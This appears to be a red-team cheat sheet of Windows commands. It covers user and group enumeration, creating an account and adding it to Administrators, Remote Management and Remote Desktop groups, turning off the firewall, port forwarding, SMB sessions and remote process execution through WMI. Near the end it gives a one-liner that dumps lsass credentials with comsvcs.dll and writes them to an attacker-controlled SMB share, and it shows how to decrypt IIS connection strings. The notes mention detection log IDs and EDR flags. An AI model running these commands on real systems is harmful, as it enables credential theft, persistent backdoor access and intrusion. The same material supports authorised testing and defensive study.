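% windows
# Search for a string within a file (case-insensitive; the search string must be quoted)
type <file> | find /i "<string>"
# Search for a regexp within a file (findstr treats the pattern as a regex by default; a space-separated pattern is split into several patterns, use /c:"<phrase>" to search for a phrase, /i to ignore case)
type <file> | findstr "<regexp>"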
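% windows, group
# list local users
net user
# list local groups
net localgroup
# list members of a local group
net localgroup <group>
# Create user, add it to admin group, winrm group (remote shell) and rdp group (remote gui)
# NOTE: account and group-membership changes are written to the Security log (4720 user created, 4732 member added) and are a common detection — remove the account when done
# NOTE: the password is passed on the command line (history / 4688 command-line auditing) and must satisfy the local password policy or /add fails
net user <name> <pass> /add
net localgroup Administrators <name> /add
net localgroup "Remote Management Users" <name> /add
net localgroup "Remote Desktop Users" <name> /add
# Add a user
net user <logon_name> <pass> /add
# Put user in a group
net localgroup <group> <user> /add
# Remove user from group
net localgroup <group> <user> /del
# Delete a user
net user <logon_name> /del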
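% windows, firewall
# See whole firewall config
netsh advfirewall show allprofiles
# Delete firewall rule (by rule name; the subcommand is "delete rule", not "del")
netsh advfirewall firewall delete rule name="<rule_name>"
# Disable firewall on all profiles (very noisy; re-enable with "state on" when done)
netsh advfirewall set allprofiles state off
# show all forwarded ports
netsh interface portproxy show all
# add a port forward (needs the "IP Helper" service (iphlpsvc) running; the entry is stored in the registry and survives reboots, so remove it afterwards)
netsh interface portproxy add v4tov4 listenport=<lport> listenaddress=<lip> connectaddress=<cip> connectport=<cport>
# delete a port forward
netsh interface portproxy delete v4tov4 listenport=<lport> listenaddress=<lip>
# remove all port forwards
netsh interface portproxy reset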
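% windows, registry
# Read a reg key
reg query <key>
# Read a reg key remotely (the machine is part of the key path; needs the Remote Registry service running on the target; only HKLM and HKU are reachable remotely)
reg query \\<target>\<key>
# Change a key (add /f to overwrite an existing value without prompting)
reg add <keyname> /v <valuename> /t <type> /d <data>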
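% windows, smb
# Set up a session with a target without mapping a drive (/u: is short for /user:; the password ends up in command history and process command-line logs)
net use \\<target> <password> /u:<user>
# Mount a target share on the next free drive letter
net use * \\<target>\share <pass> /u:<user>
# Mount a target share (alternative, explicit machine or domain for the account)
net use * \\<target>\share <pass> /u:<machinename_or_domain>\<user>
# Delete an smb session
net use \\<target> /del
# Drop all smb sessions
net use * /del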
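% windows, service
# List running services
sc query
# via wmic (wmic is deprecated on current Windows; Get-Service / Get-CimInstance Win32_Service is the replacement)
wmic service where (displayname like "%<pattern>%") get name
# List running services remotely
sc \\<target> query
# List all services (the space after "state=" is required)
sc query state= all
# Details for a service
sc query <name>
# show service permissions (security descriptor in SDDL form — useful to spot who may change/start the service)
sc sdshow <service>
# start a service
sc start <name>
# set the start type to manual (other values: auto, disabled; the space after "start=" is required)
sc config <name> start= demand
# stop a service
sc stop <name>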
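% windows, exec, command, process
# exec command with wmic (remote WMI over DCOM/RPC, needs local admin on the target; wmic is deprecated on current Windows — Invoke-CimMethod is the replacement)
# NOTE: the password is visible on the command line (history, process listings, 4688 command-line auditing)
wmic /node:<target> /user:<admin_user> /password:<pass> process call create <cmd>
# list processes on target
wmic /node:<target> /user:<admin_user> /password:<pass> process list brief
# Kill process on target by pid
wmic /node:<target> /user:<admin_user> /password:<pass> process where processid="<pid>" delete
# Kill process on target by name
wmic /node:<target> /user:<admin_user> /password:<pass> process where name="<name>" delete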
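% windows, env
# whoami (prints USERNAME from the environment; "whoami /all" also lists groups and privileges)
set username
# show path for commands to run
set path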
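% windows, find, search
# basic search
dir /b /s <dir>\<file>
# Find file from systemroot
dir /b /s %systemroot%\<file>
# Dump lsass with the built-in comsvcs.dll MiniDump export (LOLBin, no tool dropped on the target) and write it straight to an attacker-controlled SMB share
# NOTE: runs under WDAC because rundll32 and comsvcs.dll are signed Microsoft binaries, it is not a WDAC bypass as such; needs local admin (SeDebugPrivilege); fails when LSA Protection (RunAsPPL) is enabled; Defender/EDR commonly flag comsvcs MiniDump; the dump holds credentials — protect and delete it
New-PSDrive -Name "X" -PSProvider "FileSystem" -Root "\\smbserver_under_your_control\<share>"
powershell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id x:\lsassdump.bin full
# IIS: decrypt the connectionStrings section of the web.config in an IIS application directory
# NOTE: must run on the IIS host (uses the machine RSA key container) and rewrites web.config in place (re-encrypt with -pef); use Framework\ instead of Framework64\ for 32-bit app pools
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf connectionStrings C:\Inetpub\wwwroot\<dir>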